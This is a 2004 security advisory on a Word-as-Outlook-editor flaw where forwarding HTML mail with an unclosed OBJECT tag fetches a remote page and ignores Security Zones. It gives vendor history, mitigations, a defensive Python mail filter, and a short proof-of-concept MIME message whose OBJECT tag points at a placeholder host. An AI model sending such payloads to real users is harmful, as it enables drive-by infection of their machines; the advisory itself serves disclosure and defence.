
mswordEmail.txt

Posted Jul 8, 2004
Authored by James C. Slora Jr.

Outlook 2000 and 2003 allow execution of remote web pages specified within the data property of OBJECT tags when there is no closing /OBJECT tag, while forwarding an HTML email message using Word 2000 or 2003 as the email editor. This behavior happens regardless of Security Zone settings.

tags | advisory, remote, web
SHA-256 | 77a5bf7ed41d1d5076c78d070bbafd955f62a940782384b651ebf42c89e813da

==============================================
Microsoft Word Email Object Data Vulnerability
==============================================


==============================================
Summary:
==============================================
Outlook 2000 and 2003 allow execution of remote web pages specified
within the data property of OBJECT tags when there is no closing /OBJECT
tag, while forwarding an HTML email message using Word 2000 or 2003 as
the email editor. This behavior happens regardless of Security Zone
settings - it completely ignores them.

Spammed exploits are very much in the wild and are affecting systems
even if the bug is beyond the scope of the spammers' original intent.

==============================================
Vendor notification:
==============================================
June 8 - email to secure@microsoft.com (no response)
June 14 - email again to secure@microsoft.com, initial response came
same day
June 15 through July 2 - Several messages back and forth
July 2 - final and detailed response from Microsoft
Result: They consider it a variation of web bug behavior, and may take
care of it in future Office releases if they decide to modify Outlook's
download behavior when forwarding and replying.

**********************
Disclaimer: Testing was very limited. There are probably mistakes and
holes in my analysis, and this all needs to be reviewed further. Use at
your own risk, no liability for misuse, etc.
**********************

==============================================
Severity:
==============================================
I consider it at least moderate because large volumes of spam easily
overcome long odds of exploiting it in any given case, and because many
people believe they are immune to old-fashioned OBJECT data exploits if
they are up to date on their patches. In addition, the apparent Security
Zone bypass side of it may indicate additional, more serious risks in
Word email.

==============================================
Products tested
==============================================
Affected:
Outlook 2003 with MS Word 2003 as the email editor on XP Pro SP1
Outlook 2000 with MS Word 2000 as the email editor on Win2K Pro SP4

Not affected:
Outlook 2003 with its own email editor on XP Pro SP1
Outlook 2000 with its own email editor on Win2K Pro SP4

Not tested:
No other configurations tested.

==============================================
Details:
==============================================
The OBJECT tag gets processed on any version of Outlook, but Outlook
blocks ActiveX controls if it is up to date on patches (anything since
2000) with default Restricted Zone settings. That blocking works
correctly on the affected systems except in one specific scenario:

When using MS Word as the email editor and forwarding an HTML email
message containing an OBJECT tag with no closing /OBJECT, MS Word
downloads the page referred to in the "data" property of the OBJECT with
no prompt to the user.

So if the user forwards a spam message to someone (such as their mail
administrator), the user may infect their own computer.

This only works when forwarding a message - not when replying. It also
only appears to work if the OBJECT tag is not closed with a /OBJECT.

==============================================
Fix:
==============================================
None available AFAIK

==============================================
Mitigators:
==============================================
- Don't use Word as the email editor
- Don't forward spam messages, just forward headers or source from
Tools>Options
- Filter HTML mail containing OBJECT tags, whether enclosed by HTML tags
or not, and especially if there is no closing /OBJECT

Those mitigators stop the execution of the OBJECT data reference.

Frequently suggested mitigators that do not help so much:
- Removing the HTA MIME-Type, and killbitting the adodb.stream and
shell.application controls, do not help.
- Outlook Restricted Zone settings do not help.
- Locking down the My Computer security zone does not help.

Those mitigators don't stop execution but may help stop secondary
exploits that might be hosted at the OBJECT data reference.
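
Added example (not part of the original advisory): one way to implement
the third mitigator above as a mail-filter check in Python. It decodes
each text/html part and treats a remote data URL with no closing /OBJECT
as the worst case; the sample message, its example.invalid URL, the
function names and the verdict labels are constructed for illustration.

```python
import re
from email import message_from_string
from email.policy import default

OPEN_RE = re.compile(r"<\s*object\b([^>]*)>", re.I)       # opening tag + attributes
CLOSE_RE = re.compile(r"<\s*/\s*object\s*>", re.I)        # closing tag
DATA_RE = re.compile(r"""\bdata\s*=\s*["']?([^"'\s>]+)""", re.I)
REMOTE_RE = re.compile(r"(https?|ftp):", re.I)

# Constructed sample modelled on the advisory's message; URL is a placeholder.
SAMPLE = (
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/alternative; boundary="b001"\n\n'
    "--b001\n"
    "Content-Type: text/html\n"
    "Content-Transfer-Encoding: quoted-printable\n\n"
    '<object data=3D"http://example.invalid/page.php">\n\n'
    "--b001--\n"
)


def scan_html(html):
    """Return (data_url, is_remote, is_closed) for each OBJECT tag."""
    closes = [m.start() for m in CLOSE_RE.finditer(html)]
    findings = []
    for m in OPEN_RE.finditer(html):
        data = DATA_RE.search(m.group(1))
        url = data.group(1) if data else None
        remote = bool(url and REMOTE_RE.match(url))
        closed = any(c >= m.end() for c in closes)  # a /OBJECT follows this tag
        findings.append((url, remote, closed))
    return findings


def scan_message(raw):
    """Scan every text/html part; get_content() undoes quoted-printable."""
    msg = message_from_string(raw, policy=default)
    return [f for part in msg.walk() if part.get_content_type() == "text/html"
            for f in scan_html(part.get_content())]


def verdict(raw):
    """quarantine: remote data with no closing /OBJECT; flag: any OBJECT tag."""
    found = scan_message(raw)
    if any(remote and not closed for _, remote, closed in found):
        return "quarantine"
    return "flag" if found else "pass"


if __name__ == "__main__":
    print(verdict(SAMPLE), scan_message(SAMPLE))
```

The regexes are a coarse filter rather than an HTML parser, so a ">"
inside a quoted attribute value will cut the match short.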

==============================================
Proof of concept:
==============================================
Check your spam for OBJECT tags that call Web URLs. This stuff is
everywhere. Here is the basic idea:

MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="--001"

----001
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

|object data=3D"http://www.foobar.foo/page.php"|

----001--
